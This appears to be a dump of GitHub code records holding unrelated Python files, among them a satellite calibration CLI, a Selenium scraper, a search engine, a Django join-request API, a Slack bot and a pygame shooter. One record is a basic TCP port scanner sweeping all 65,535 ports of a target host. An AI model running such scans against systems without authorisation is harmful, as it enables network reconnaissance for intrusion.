parse.add_argument(\"--infolder\", required=True, default=False, help=\"input S1 GRD folder\")\n parse.add_argument(\"--outfolder\", required=False, default=False, help=\"output folder for calibrated products\")\n parse.add_argument(\"--polarization\", required=False, default='HH', choices=['HH','VV','VH','HV'], help=\"polarization to process.\")\n parse.add_argument(\"--basename\", required=False, default=False, help=\"base folder/filename to use for output products\")\n parse.add_argument(\"--wkt\", required=False, default=False, help=\"wkt polygon bounds\")\n parse.add_argument(\"--shapefile\", required=False, default=False, help=\"shapefile for bounds\")\n parse.add_argument(\"--pixel_spacing\", required=False, default=100, type=float, help=\"Pixel spacing in meters\")\n parse.add_argument(\"--in_decibels\", action=\"store_true\", help=\"output is scaled in decibels\")\n parse.add_argument(\"--unzip\", action=\"store_true\", help=\"will extract zipped files\")\n parse.add_argument(\"--cleanup\", action=\"store_true\", help=\"cleanup intermediate files\")\n return parse\n\nif __name__ == '__main__':\n args = parser().parse_args()\n main(infolder=args.infolder, outfolder=args.outfolder, polarization=args.polarization,\n basename=args.basename, wktstring=args.wkt, shapefile=args.shapefile,\n pixel_spacing=args.pixel_spacing, db=args.in_decibels, cleanup=args.cleanup, unzip=args.unzip)\n","repo_name":"jlinick/S1GRD_TS","sub_path":"calibrate.py","file_name":"calibrate.py","file_ext":"py","file_size_in_byte":8703,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
+{"seq_id":"20294254065","text":"n, m = map(int, input().split())\r\nmemo = list(list(-1 for i in range(j+1)) for j in range(n+1))\r\nmemo[0][0] = 1\r\nmemo[1][0] = 1\r\nmemo[1][1] = 1\r\nfor i in range(2, n+1):\r\n for j in range(0, i+1):\r\n if j == 0 or j == i:\r\n memo[i][j] = 1\r\n else:\r\n memo[i][j] = memo[i-1][j] + memo[i-1][j-1]\r\nprint(\"%d\" % (memo[n][m]))","repo_name":"SHL0915/BOJ_Problem_Solving","sub_path":"백준/Silver/2407. 조합/조합.py","file_name":"조합.py","file_ext":"py","file_size_in_byte":354,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
+{"seq_id":"15100792118","text":"from selenium import webdriver\nfrom selenium.webdriver.support import expected_conditions as ec\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.chrome.options import Options\nfrom selenium.webdriver.common.by import By\n\nf = open(\"WomenShoesLinks_v1.0.1.txt\")\nline = f.readline()\nf.close()\n\noptions = Options()\noptions.headless = True\n\ndriver = webdriver.Chrome(options=options)\ndriver.get(line)\n\nstateCookieBanner = False #not closed\n\nwhile stateCookieBanner == False:\n try:\n # Wait for cookie message\n close_icon = WebDriverWait(driver, 10).until(ec.visibility_of_element_located((By.XPATH, '//*[@id=\"cookie-notifcation-banner\"]/div/button[1]')))\n close_icon.click()\n # Wait for cookie message to disappear\n WebDriverWait(driver, 10).until(ec.invisibility_of_element_located((By.XPATH, '//*[@id=\"cookie-notifcation-banner\"]/div/button[1]')))\n stateCookieBanner = True\n print(\"\\nCookie banner closed\\n\")\n except Exception as e:\n print(\"\\nCookie banner closed\\n\")\n\nfind_in_store_btn = WebDriverWait(driver, 20).until(ec.visibility_of_element_located((By.XPATH, '//*[@id=\"pdp-store-stock-checker-link\"]')))\nfind_in_store_btn.click()\n\nproduct_size_btn = WebDriverWait(driver, 20).until(ec.visibility_of_element_located((By.CSS_SELECTOR,'#pdp-store-stock-checker-app-container > div > aside > div > section > form > div.size-selector > ul > li:nth-child(1) > button')))\nproduct_size_btn.click()\n\nlocation_inp = WebDriverWait(driver, 20).until(ec.visibility_of_element_located((By.XPATH,'//*[@id=\"pdp-store-stock-checker-app-container\"]/div/aside/div/section/form/div[2]/div/input')))\nlocation_inp.send_keys('London')\n\ncheck_availability_btn = WebDriverWait(driver, 20).until(ec.visibility_of_element_located((By.XPATH,'//*[@id=\"pdp-store-stock-checker-app-container\"]/div/aside/div/section/form/button')))\ncheck_availability_btn.click()\n\nclose_bag = WebDriverWait(driver, 20).until(ec.visibility_of_element_located((By.CSS_SELECTOR, '#pdp-store-stock-checker-app-container > div > aside > div > section > section.store-stock-checker__section.store-stock-checker__popup.store-stock-checker__popup--visible > div > button.reset-btn.icon-ui-close.store-stock-checker__popup-close')))\nclose_bag.click()\n\nlocation_list = driver.find_element_by_xpath('//*[@id=\"pdp-store-stock-checker-app-container\"]/div/aside/div/section/section[2]/ul')\nlocations = location_list.find_elements_by_tag_name('li')\nfor location in locations:\n text = location.text\n print(text)\n\nf = open(\"ProductLocation.txt\", \"x\")\nf = open(\"ProductLocation.txt\", \"a\")\nfor location in locations:\n text = location.text\n f.write(text + \"\\n\\n\")\n \nf.close()\n\ndriver.quit()\n\n\n\n","repo_name":"OmarSaidIbrahim/python-web-automatation-selenium","sub_path":"automata-versions/automatation_v1.0.1.py","file_name":"automatation_v1.0.1.py","file_ext":"py","file_size_in_byte":2735,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"38"}
+{"seq_id":"13467327116","text":"from index import Index\nfrom score import rank_tweets, CustomScorer, rank_tweets_diversity, Word2VecScorer\nfrom query import Query\nfrom pathlib import Path\nimport argparse\nimport csv\n\nDEFAULT_TWEETS = Path(__file__).parent.parent/'res'/'merge_tweets_wusers.json'\n\ndef parse_main_args():\n parser = argparse.ArgumentParser()\n group = parser.add_mutually_exclusive_group()\n group.add_argument('-index', default=None, help='Path to load index .pickle file')\n group.add_argument('-tweets', default=DEFAULT_TWEETS, help='Path to load json tweet data')\n parser.add_argument('-K', type=int, default=20, help='Maximum ranking length')\n parser.add_argument('-out', default=None, help='Path to output tsv query rankings')\n rmethod = parser.add_mutually_exclusive_group()\n rmethod.add_argument('-w2v', action='store_true', help='Use word2vec scoring')\n rmethod.add_argument('-custom', action='store_true', help='Use custom scoring (use likes and retweets)')\n rmethod.add_argument('-diversity', action='store_true', help='Use diversified output')\n return parser.parse_args()\n\nif __name__ == '__main__':\n args = parse_main_args()\n\n if args.index != None:\n print('Loading index...')\n index = Index.load(args.index)\n else:\n index = Index()\n print('Loading tweet info into index...')\n index.load_json_tweets(args.tweets)\n\n stop = False\n scorer = None\n if args.w2v:\n scorer = Word2VecScorer(index.tweets.values())\n if args.custom:\n scorer = CustomScorer(index)\n\n ranker = rank_tweets if not args.diversity else rank_tweets_diversity\n\n while not stop:\n str_query = input('Write a query: ')\n query = Query(str_query)\n output = []\n for i, tweet in enumerate(ranker(query, index, K=args.K, scorer=scorer)):\n print(i+1, '.\\n', '-'*100)\n print(str(tweet))\n output.append(tweet)\n if args.out != None:\n with open(args.out, 'at') as out_file:\n tsv_writer = csv.writer(out_file, delimiter='\\t')\n tsv_writer.writerow(['query', str_query])\n for tweet in output:\n tsv_writer.writerow(tweet.row_data())\n","repo_name":"idraveUPF/information_retrieval_final_project","sub_path":"search-engine/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2223,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
+{"seq_id":"20017477180","text":"from ._version import __version__ # noqa: F401\nfrom ._cli import Command, Argument # noqa: F401\nfrom ._precept import Precept # noqa: F401\nfrom ._tools import AutoNameEnum, is_windows # noqa: F401, F403\nfrom ._immutable import ImmutableProp, ImmutableDict, ImmutableMeta # noqa: F401, F403, E501\nfrom ._configs import ( # noqa: F401\n ConfigProperty, Config, ConfigFormat, Nestable, config_factory\n)\nfrom ._executor import AsyncExecutor # noqa: F401\nfrom ._services import Service # noqa: F401\nfrom ._plugins import Plugin # noqa: F401\n\n\n__all__ = [\n '__version__',\n 'Command',\n 'Argument',\n 'Precept',\n 'ImmutableDict',\n 'ImmutableMeta',\n 'ImmutableProp',\n 'ConfigProperty',\n 'Config',\n 'ConfigFormat',\n 'Nestable',\n 'config_factory',\n 'AsyncExecutor',\n 'Service',\n 'Plugin',\n 'is_windows',\n 'AutoNameEnum'\n]\n","repo_name":"T4rk1n/precept","sub_path":"precept/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":872,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"38"}
+{"seq_id":"31329540507","text":"import os\nimport time\nimport re\nimport slack\nimport network\nfrom dotenv import load_dotenv\n\n#load env variables\nload_dotenv()\n\n#setup RTM client\nslack_token = os.getenv(\"SLACK_BOT_TOKEN\")\nrtm_client = slack.RTMClient(token=slack_token)\nweb_client = slack.WebClient(slack_token)\nmendicant_id = web_client.api_call(\"auth.test\")[\"user_id\"]\nchannels = {} \n\n@slack.RTMClient.run_on(event='message')\ndef unpack_payload(**payload):\n \"\"\"\n executes bot command if teh command is known\n \"\"\"\n data = payload['data']\n \n if \"subtype\" in data:\n return\n\n web_client = payload['web_client']\n \n command_tokens = tokenize_command(data['text'])\n module = route_command(data, web_client)\n text = module(command_tokens)\n web_client.chat_postMessage(channel=data['channel'], text=text)\n\ndef route_command(data, webclient):\n channel = data['channel']\n\n switcher={\n channels['network']:network.handle_command \n }\n\n return switcher.get(channel, invalid_module)\n\ndef tokenize_command(command_string):\n\treturn command_string.split()\n\ndef invalid_module():\n return \"I'm sorry Reclaimer, I don't have subroutines for that module\"\nif __name__ == \"__main__\":\n convo_list = web_client.api_call(\"conversations.list\")\n channels = {channel['name']: channel['id'] for channel in convo_list['channels']}\n rtm_client.start()\n\n","repo_name":"PogopunkXIII/mendicant-bias","sub_path":"mendicant_bias.py","file_name":"mendicant_bias.py","file_ext":"py","file_size_in_byte":1366,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
+{"seq_id":"26047424162","text":"import pandas as pd\r\nfrom create_tfrecord import tfrecord\r\nimport os\r\nimport matplotlib.pyplot as plt\r\n\r\ndef label_transfer(dataset_dir):\r\n\r\n #convert label from 5 classes to 2 classes\r\n\r\n train_dir = os.path.join(dataset_dir, r\"labels\\train.csv\")\r\n test_dir = os.path.join(dataset_dir, r\"labels\\test.csv\")\r\n\r\n df_train = pd.read_csv(train_dir)\r\n df_test = pd.read_csv(test_dir)\r\n\r\n for index, row in df_train.iterrows():\r\n if row['Retinopathy grade'] <= 1:\r\n df_train.loc[index, 'Retinopathy grade'] = 0\r\n else:\r\n df_train.loc[index, 'Retinopathy grade'] = 1\r\n\r\n for index, row in df_test.iterrows():\r\n if row['Retinopathy grade'] <= 1:\r\n df_test.loc[index, 'Retinopathy grade'] = 0\r\n else:\r\n df_test.loc[index, 'Retinopathy grade'] = 1\r\n df_train.to_csv(os.path.join(dataset_dir, r\"train_binary.csv\"), index=False)\r\n df_test.to_csv(os.path.join(dataset_dir, r\"test_binary.csv\"), index=False)\r\n return df_train, df_test\r\n\r\ndef EDA(data):\r\n\r\n #Visualize dataset distribution\r\n\r\n data = data['Retinopathy grade']\r\n data_value = data.value_counts()\r\n plt.bar(data_value.index, data_value)\r\n plt.xticks(data_value.index, data_value.index.values)\r\n plt.xlabel(\"labels\")\r\n plt.ylabel(\"Frequency\")\r\n plt.title('Distribution of diabetic retinopathy in test dataset')\r\n plt.show()\r\n\r\n# change dataset_dir to your own dir\r\ndataset_dir = \"E:\\idrid\\IDRID_dataset\"\r\n# convert 5 classification to 2 classification\r\ntrain_dataset, test_dataset = label_transfer(dataset_dir)\r\n# create tfrecord files\r\ntfrecord(train_dataset, test_dataset, dataset_dir)\r\n# visualized data distribution\r\nEDA(train_dataset)\r\nEDA(test_dataset)\r\n","repo_name":"ruizhecao96/DenseNet121_DR","sub_path":"input_pipeline/data_EDA.py","file_name":"data_EDA.py","file_ext":"py","file_size_in_byte":1738,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"38"}
+{"seq_id":"32382059429","text":"#! /usr/bin/python3\nimport sys\n \nfor index, line in enumerate(sys.stdin):\n inp = line.split()\n if index == 0:\n numOfMachines = int(inp[0])\n nunOfItems = int(inp[1])\n elif index == 1:\n times = [int(i) for i in inp]\n else:\n time = sum(times) + max(times) * (nunOfItems - 1)\n print(time)\nexit(0)","repo_name":"zackeua/Kattis","sub_path":"sequentialmanufacturing/sequentialmanufacturing.py","file_name":"sequentialmanufacturing.py","file_ext":"py","file_size_in_byte":339,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
+{"seq_id":"40911998474","text":"from bisect import bisect_left\r\nimport json\r\nimport time\r\nimport pickle\r\n\r\ndef create_dict_terms_termsid(terms):\r\n ret = {}\r\n i = 1\r\n for term in terms:\r\n ret[term] = i\r\n i += 1\r\n return ret\r\n\r\n\r\ndef parsing(file, terms):\r\n # term_id = create_dict_terms_termsid(terms)\r\n with open(file, 'r') as fd:\r\n data = json.load(fd)\r\n tuples = []\r\n for doc in data:\r\n body = doc['.K'] + doc['.W'] + doc['.T'] # Seul le contenu de .K .W et .T nous intéresse\r\n for word in body.split():\r\n if binary_search(terms, word) != -1: # On vérifie que le mot est bien un terme (il appartient à l'ensemble des terms)\r\n tuples.append((word, doc['.I']))\r\n return tuples\r\n\r\ndef create_posting_list(file, terms):\r\n begin = time.time()\r\n l = parsing(file, terms)\r\n print(\"Creating posting list\")\r\n l.sort()\r\n posting_list = {}\r\n a = {l[0][1]: 1}\r\n posting_list[l[0][0]] = a\r\n for i in range(1, len(l)):\r\n if l[i][0] == l[i - 1][0]:\r\n if l[i][1] == l[i - 1][1]:\r\n a = posting_list[l[i][0]]\r\n a[l[i][1]] += 1\r\n posting_list[l[i][0]] = a\r\n else:\r\n a = posting_list[l[i][0]]\r\n a[l[i][1]] = 1\r\n posting_list[l[i][0]] = a\r\n else:\r\n a = {l[i][1]: 1}\r\n posting_list[l[i][0]] = a\r\n with open('inverted_index', 'wb') as file:\r\n my_pickler = pickle.Pickler(file)\r\n my_pickler.dump(posting_list)\r\n end = time.time()\r\n print(\"Done in {} seconds\".format(end - begin))\r\n\r\ndef binary_search(a, x, lo=0, hi=None): # can't use a to specify default for hi\r\n hi = hi if hi is not None else len(a) # hi defaults to len(a)\r\n pos = bisect_left(a,x,lo,hi) # find insertion position\r\n return (pos if pos != hi and a[pos] == x else -1)\r\n","repo_name":"kasimansour/Search-engine","sub_path":"RI-cacm/index.py","file_name":"index.py","file_ext":"py","file_size_in_byte":1913,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
+{"seq_id":"34342219389","text":"import logging\nfrom datetime import datetime\n\nimport redis.exceptions\nfrom django.core.exceptions import PermissionDenied\nfrom django.db import transaction\nfrom django.http import Http404\nfrom django.utils.translation import gettext as _\nfrom drf_spectacular.utils import (\n OpenApiResponse,\n extend_schema,\n extend_schema_view,\n inline_serializer,\n)\nfrom rest_framework import status\nfrom rest_framework.decorators import action\nfrom rest_framework.exceptions import ValidationError\nfrom rest_framework.response import Response\nfrom rest_framework.viewsets import ModelViewSet\n\nfrom backend.models import Membership, Site\nfrom backend.models.constants import Role\nfrom backend.models.join_request import JoinRequest, JoinRequestStatus\nfrom backend.serializers import fields\nfrom backend.serializers.join_request_serializers import JoinRequestDetailSerializer\nfrom backend.tasks.send_email_tasks import send_email_task\nfrom backend.views import doc_strings\nfrom backend.views.base_views import FVPermissionViewSetMixin, SiteContentViewSetMixin\nfrom backend.views.utils import get_site_url_from_appjson\n\n\n@extend_schema_view(\n list=extend_schema(\n description=_(\n \"A list of pending join requests associated with the specified site.\"\n ),\n responses={\n 200: OpenApiResponse(\n description=doc_strings.success_200_list,\n response=JoinRequestDetailSerializer,\n ),\n 403: OpenApiResponse(description=doc_strings.error_403_site_access_denied),\n 404: OpenApiResponse(description=doc_strings.error_404_missing_site),\n },\n ),\n retrieve=extend_schema(\n description=_(\"Details about a specific join request.\"),\n responses={\n 200: OpenApiResponse(\n description=doc_strings.success_200_detail,\n response=JoinRequestDetailSerializer,\n ),\n 403: OpenApiResponse(description=doc_strings.error_403),\n 404: OpenApiResponse(description=doc_strings.error_404),\n },\n ),\n create=extend_schema(\n description=_(\"Create a join request.\"),\n responses={\n 201: OpenApiResponse(\n description=doc_strings.success_201,\n response=JoinRequestDetailSerializer,\n ),\n 400: OpenApiResponse(description=doc_strings.error_400_validation),\n 403: OpenApiResponse(description=doc_strings.error_403),\n 404: OpenApiResponse(description=doc_strings.error_404_missing_site),\n },\n ),\n destroy=extend_schema(\n description=_(\"Delete a join request.\"),\n responses={\n 204: OpenApiResponse(\n description=doc_strings.success_204_deleted,\n ),\n 400: OpenApiResponse(description=doc_strings.error_400_validation),\n 403: OpenApiResponse(description=doc_strings.error_403),\n 404: OpenApiResponse(description=doc_strings.error_404),\n },\n ),\n approve=extend_schema(\n description=_(\n \"Approve a join request, and create a corresponding site membership.\"\n ),\n request=inline_serializer(\n name=\"Join Request Approval\", fields={\"role\": fields.EnumField(enum=Role)}\n ),\n responses={\n 200: OpenApiResponse(\n description=doc_strings.success_200_edit,\n response=JoinRequestDetailSerializer,\n ),\n 400: OpenApiResponse(description=doc_strings.error_400_validation),\n 403: OpenApiResponse(description=doc_strings.error_403),\n 404: OpenApiResponse(description=doc_strings.error_404),\n },\n ),\n ignore=extend_schema(\n description=_(\"Ignore a join request.\"),\n request=inline_serializer(name=\"Join Request Ignore\", fields={}),\n responses={\n 200: OpenApiResponse(\n description=doc_strings.success_200_edit,\n ),\n 400: OpenApiResponse(description=doc_strings.error_400_validation),\n 403: OpenApiResponse(description=doc_strings.error_403),\n 404: OpenApiResponse(description=doc_strings.error_404),\n },\n ),\n reject=extend_schema(\n description=_(\"Reject a join request.\"),\n request=inline_serializer(name=\"Join Request Rejection\", fields={}),\n responses={\n 200: OpenApiResponse(\n description=doc_strings.success_200_edit,\n ),\n 400: OpenApiResponse(description=doc_strings.error_400_validation),\n 403: OpenApiResponse(description=doc_strings.error_403),\n 404: OpenApiResponse(description=doc_strings.error_404),\n },\n ),\n)\nclass JoinRequestViewSet(\n SiteContentViewSetMixin, FVPermissionViewSetMixin, ModelViewSet\n):\n \"\"\"\n API endpoint for managing join requests.\n \"\"\"\n\n serializer_class = JoinRequestDetailSerializer\n http_method_names = [\"get\", \"post\", \"delete\"]\n\n permission_type_map = {\n \"create\": \"add\",\n \"destroy\": \"delete\",\n \"list\": None,\n \"partial_update\": \"change\",\n \"retrieve\": \"view\",\n \"update\": \"change\",\n \"approve\": \"change\", # custom actions use change permission\n \"ignore\": \"change\",\n \"reject\": \"change\",\n }\n\n def get_queryset(self):\n site = self.get_validated_site()\n return JoinRequest.objects.filter(\n site__slug=site[0].slug, status=JoinRequestStatus.PENDING\n ).select_related(\n \"site\", \"site__language\", \"created_by\", \"last_modified_by\", \"user\"\n )\n\n def get_validated_site(self):\n site_slug = self.get_site_slug()\n site = Site.objects.filter(slug=site_slug)\n\n if len(site) == 0:\n raise Http404\n\n # Check permissions on the site first, skip if the action is create\n if self.action != \"create\":\n perm = Site.get_perm(\"view\")\n if self.request.user.has_perm(perm, site[0]):\n return site\n else:\n raise PermissionDenied\n else:\n return site\n\n @action(detail=True, methods=[\"post\"])\n def ignore(self, request, site_slug=None, pk=None):\n join_request = self.get_object()\n\n self.update_join_request_status(\n join_request, JoinRequestStatus.IGNORED, request.user\n )\n\n serializer = self.get_serializer(join_request)\n return Response(serializer.data, status=status.HTTP_200_OK)\n\n @action(detail=True, methods=[\"post\"])\n def reject(self, request, site_slug=None, pk=None):\n join_request = self.get_object()\n\n self.update_join_request_status(\n join_request, JoinRequestStatus.REJECTED, request.user\n )\n\n subject = (\n f\"Update on your request to join {join_request.site.title} on FirstVoices\"\n )\n message = (\n f\"Thank you for requesting to join the {join_request.site.title} site on FirstVoices. \"\n \"A community administrator has reviewed your request. At this time, your request to view private content \"\n \"has not been approved. The site may not be accepting members at this time.\\n\\n\"\n \"Your request may be re-reviewed at a later date.\\n\\n\"\n \"All decisions regarding requests to view private content are made solely by community-based language \"\n \"administrators.\\n\\n\"\n \"If you think this may be a technical error, you can contact FirstVoices staff at \"\n \"hello@firstvoices.com.\\n\\n\"\n )\n\n try:\n send_email_task.apply_async((subject, message, [join_request.user.email]))\n except redis.exceptions.ConnectionError as e:\n logger = logging.getLogger(__name__)\n logger.error(f\"Could not queue task. Error: {e}\")\n\n serializer = self.get_serializer(join_request)\n return Response(serializer.data, status=status.HTTP_200_OK)\n\n @action(detail=True, methods=[\"post\"])\n def approve(self, request, site_slug=None, pk=None):\n if \"role\" not in request.data:\n raise ValidationError({\"role\": [\"This field is required.\"]})\n\n try:\n role_value = request.data[\"role\"]\n role = Role[role_value.upper()]\n except KeyError:\n raise ValidationError(\n {\"role\": [\"value must be one of: \" + \", \".join(Role.names)]}\n )\n\n join_request = self.get_object()\n\n has_membership = Membership.objects.filter(\n site=join_request.site, user=join_request.user\n ).first()\n if has_membership:\n raise ValidationError(\"User already has a membership on this site\")\n\n with transaction.atomic():\n Membership.objects.create(\n user=join_request.user, site=join_request.site, role=role\n )\n self.update_join_request_status(\n join_request, JoinRequestStatus.APPROVED, request.user\n )\n\n subject = f\"Welcome to the {join_request.site.title} FirstVoices site!\"\n message = (\n f\"Thank you for requesting to join the {join_request.site.title} site on FirstVoices.\\n\"\n \"A community administrator has approved your request.\\n\\n\"\n f\"You are now approved on the {join_request.site.title} site with the role: {role.label}\\n\"\n \"\"\n )\n base_url = get_site_url_from_appjson(join_request.site)\n if base_url:\n message = (\n message\n + f\"Visit the {join_request.site.title} site here: {base_url}\\n\\n\"\n )\n else:\n message = message + \"\\n\"\n\n try:\n send_email_task.apply_async((subject, message, [join_request.user.email]))\n except redis.exceptions.ConnectionError as e:\n logger = logging.getLogger(__name__)\n logger.error(f\"Could not queue task. Error: {e}\")\n\n serializer = self.get_serializer(join_request)\n return Response(serializer.data, status=status.HTTP_200_OK)\n\n def update_join_request_status(self, join_request, status, user):\n join_request.status = status\n join_request.last_modified_by = user\n join_request.last_modified = datetime.now()\n join_request.save()\n","repo_name":"First-Peoples-Cultural-Council/fv-be","sub_path":"firstvoices/backend/views/join_request_views.py","file_name":"join_request_views.py","file_ext":"py","file_size_in_byte":10337,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"38"}
+{"seq_id":"24962315974","text":"import socket\nimport pyfiglet\nimport sys\nfrom datetime import datetime\n\nascii_banner = pyfiglet.figlet_format(\"PORT SCANNER\")\nprint(ascii_banner)\n\n\nif len(sys.argv) == 2:\n target = socket.gethostbyname(sys.argv[1])\nelse:\n print(\"Invalid amount of arguments!\")\n\nprint(\"\" * 50)\nprint(f\"Scanning target: {target}\")\nprint(f\"Scanning target at: {str(datetime.now())}\")\nprint(\"-\" * 50)\n\ntry:\n for port in range(1, 65535):\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n socket.setdefaulttimeout(1)\n\n result = s.connect_ex((target, port))\n if result == 0:\n print(f\"Port {port} is open.\")\n s.close()\nexcept KeyboardInterrupt:\n print(\"\\nExiting program.\")\n sys.exit()\nexcept socket.gaierror:\n print(\"\\nHostname could not be resolved.\")\n sys.exit()\nexcept socket.error:\n print(\"\\nServer not responding.\")\n sys.exit()\n","repo_name":"andref50/console-chat","sub_path":"utils/port_scanner.py","file_name":"port_scanner.py","file_ext":"py","file_size_in_byte":888,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"38"}
+{"seq_id":"33922375010","text":"import os\n\nfrom loguru import logger\nfrom aio_binance.futures.usdt import Client\nfrom unicorn_binance_rest_api import BinanceRestApiManager\nfrom unicorn_binance_websocket_api import BinanceWebSocketApiManager\n\nBINANCE_API_CLIENT = BinanceRestApiManager(exchange=\"binance.com-futures\")\nAIO_BINANCE_API_CLIENT = Client(show_limit_usage=True)\nBINANCE_WEBSOCKET_MANAGER = BinanceWebSocketApiManager(exchange=\"binance.com-futures\")\nKLINES_DATA = {}\n\nFIRST_KLINE_STREAM_ID = \"\"\nSECOND_KLINE_STREAM_ID = \"\"\n\nlog_folder = \"./logs\"\nos.makedirs(log_folder, exist_ok=True)\n\nlogger.add(f\"{log_folder}/file_{{time:DD-MM}}_{{time:HH-mm}}.log\", rotation=\"100 MB\", retention=\"1 day\",\n encoding='utf-8')\n\n__all__ = [\n 'BINANCE_API_CLIENT', 'BINANCE_WEBSOCKET_MANAGER',\n 'FIRST_KLINE_STREAM_ID', 'SECOND_KLINE_STREAM_ID',\n 'KLINES_DATA', 'AIO_BINANCE_API_CLIENT',\n]","repo_name":"nastiakostenyuk/alert_server_v1","sub_path":"loader.py","file_name":"loader.py","file_ext":"py","file_size_in_byte":866,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
+{"seq_id":"36751184486","text":"import sys\r\nimport pygame\r\nfrom bullet import Bullet\r\nfrom alien import Alien\r\nfrom time import sleep\r\nimport random\r\n\r\n\r\n# 响应按键函数\r\ndef check_keydown_events(event, ai_settings, screen, ship, bullets):\r\n if event.key == pygame.K_RIGHT:\r\n ship.moving_right = True\r\n elif event.key == pygame.K_LEFT:\r\n ship.moving_left = True\r\n elif event.key == pygame.K_SPACE:\r\n fire_bullets(ai_settings, screen, ship, bullets)\r\n elif event.key == pygame.K_q:\r\n sys.exit() # 快捷退出\r\n\r\n\r\ndef check_keyup_events(event, ship):\r\n if event.key == pygame.K_RIGHT:\r\n ship.moving_right = False\r\n elif event.key == pygame.K_LEFT:\r\n ship.moving_left = False\r\n\r\n\r\ndef check_events(ai_settings, screen, ship, bullets):\r\n for event in pygame.event.get():\r\n # 监听键盘和鼠标事件\r\n if event.type == pygame.QUIT:\r\n sys.exit()\r\n elif event.type == pygame.KEYDOWN: # 上下左右移动\r\n check_keydown_events(event, ai_settings, screen, ship, bullets)\r\n elif event.type == pygame.KEYUP:\r\n check_keyup_events(event, ship)\r\n\r\n\r\ndef update_screen(ai_settings, screen, ship, aliens, bullets):\r\n screen.fill(ai_settings.bg_color) # 每次循环时均重新绘制屏幕\r\n for bullet in bullets: # 重新绘制每颗子弹\r\n bullet.draw_bullet()\r\n ship.blitme() # 每次循环时重新绘制飞船\r\n aliens.draw(screen)\r\n pygame.display.flip() # 让绘制屏幕可见\r\n\r\n\r\ndef update_bullets(aliens, bullets):\r\n bullets.update()\r\n # 删除子弹\r\n for bullet in bullets.copy():\r\n if bullet.rect.bottom <= 0:\r\n bullets.remove(bullet)\r\n pygame.sprite.groupcollide(bullets, aliens, True, True)\r\n\r\n\r\ndef fire_bullets(ai_settings, screen, ship, bullets):\r\n # 限制屏幕上最多子弹数量\r\n if len(bullets) < ai_settings.bullets_allowed:\r\n # 创建子弹\r\n new_bullet = Bullet(ai_settings, screen, ship)\r\n bullets.add(new_bullet)\r\n\r\n\r\ndef check_alien_num(ai_settings, screen, ship, aliens, bullets):\r\n if len(aliens) == 0:\r\n # 若外星人均消灭,重新创建外星人\r\n bullets.empty()\r\n create_fleet(ai_settings, screen, ship, aliens)\r\n\r\n\r\ndef create_fleet(ai_settings, screen, ship, aliens):\r\n alien = Alien(ai_settings, screen)\r\n alien_width = alien.rect.width\r\n number_aliens_x = get_number_aliens_x(ai_settings, alien_width)\r\n number_rows = get_number_rows(ai_settings, ship.rect.height, alien.rect.height)\r\n\r\n for row_number in range(number_rows):\r\n for alien_number in range(number_aliens_x):\r\n if random.random() >= 0.5:\r\n create_alien(ai_settings, screen, aliens, alien_number, alien_width, row_number)\r\n\r\n\r\ndef get_number_aliens_x(ai_settings, alien_width):\r\n # 计算一行可以放置外星人的宽度\r\n available_space_x = ai_settings.screen_width - 2 * alien_width\r\n # 计算一行可以放置外星人的个数\r\n number_aliens_x = int(available_space_x / (1.5 * alien_width))\r\n return number_aliens_x\r\n\r\n\r\ndef create_alien(ai_settings, screen, aliens, alien_number, alien_width, row_number):\r\n alien = Alien(ai_settings, screen)\r\n alien.x = alien_width + 1.5 * alien_width * alien_number\r\n alien.rect.x = alien.x\r\n alien.y = alien.rect.height / 2 + 1.5 * alien.rect.height * row_number\r\n alien.rect.y = alien.y\r\n aliens.add(alien)\r\n\r\n\r\n# 计算容纳多少行外星人\r\ndef get_number_rows(ai_settings, ship_height, alien_height):\r\n available_space_y = ai_settings.screen_height - (4.5 * alien_height) - ship_height\r\n number_rows = int(available_space_y / (1.5 * alien_height))\r\n return number_rows\r\n\r\n\r\ndef update_aliens(ai_settings, stats, screen, ship, aliens, bullets):\r\n for alien in aliens.sprites():\r\n alien.y += ai_settings.fleet_drop_speed\r\n alien.rect.y = alien.y\r\n if pygame.sprite.spritecollideany(ship, aliens):\r\n ship_hit(ai_settings, stats, screen, ship, aliens, bullets)\r\n check_aliens_bottom(ai_settings, stats, screen, ship, aliens, bullets)\r\n check_alien_num(ai_settings, screen, ship, aliens, bullets)\r\n check_fleet_edges(ai_settings, aliens)\r\n aliens.update()\r\n # 对编组update,相当于对每个外星人update\r\n # 检查外星人与飞船的碰撞\r\n\r\n\r\ndef check_fleet_edges(ai_settings, aliens):\r\n for alien in aliens.sprites():\r\n if alien.check_edges():\r\n ai_settings.fleet_direction *= -1\r\n break\r\n\r\n\r\ndef ship_hit(ai_settings, stats, screen, ship, aliens, bullets):\r\n if stats.ship_left > 0:\r\n stats.ship_left -= 1\r\n aliens.empty()\r\n bullets.empty()\r\n # 重建飞船\r\n ship.center_ship()\r\n sleep(0.5)\r\n else:\r\n stats.game_active = False\r\n\r\n\r\ndef check_aliens_bottom(ai_settings, stats, screen, ship, aliens, bullets):\r\n screen_rect = screen.get_rect()\r\n for alien in aliens.sprites():\r\n if alien.rect.bottom >= screen_rect.bottom:\r\n aliens.remove(alien)\r\n\r\n\r\n\r\n","repo_name":"cuuuute/Alien-Gaming","sub_path":"Alien_Gaming_1107/game_functions.py","file_name":"game_functions.py","file_ext":"py","file_size_in_byte":5075,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"38"}
